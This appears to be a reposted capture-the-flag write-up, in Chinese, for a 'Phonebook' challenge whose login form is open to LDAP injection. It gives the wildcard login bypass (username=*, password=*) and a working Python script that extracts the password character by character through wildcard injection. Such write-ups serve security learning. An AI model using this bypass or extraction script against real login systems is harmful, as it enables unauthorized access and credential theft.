Phonebook
访问页面,得到一个登录框。

经过测试发现存在ldap注入[1],当username=*,password=*时,能够直接进入系统。

这里写了一个脚本去跑password,最终得到了flag(如果无法访问实例的话请添加代理):
#!/usr/bin/python3
'''
在登录框中存在ldap注入
'''
import requests
dic = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890_{}'
password = ''
while True:
if password[-1:] == '}':
break
pl = len(password)
for i in dic:
tempPassword = password + i + '*'
print('test password:' + tempPassword)
res = requests.post(url='http://******/login', allow_redirects=False, data={'username': '*', 'password': tempPassword})
if res.headers['Location'] == '/':
password = tempPassword[:-1]
break
if pl == len(password):
print('[error] dict fault, change dict!')
break
print('[success] password:' + password)
参考
- https://www.cnblogs.com/endust/p/11811477.html
ldap注入漏洞利用:Python暴力破解手机book系统获取flag
本文介绍了一种针对存在ldap注入漏洞的Phonebook系统,通过Python脚本进行暴力破解,逐个字符尝试直至找到系统登录凭证的过程。阅读者可以借此了解如何利用注入漏洞进行安全测试并获取flag。
3640

被折叠的 条评论
为什么被折叠?



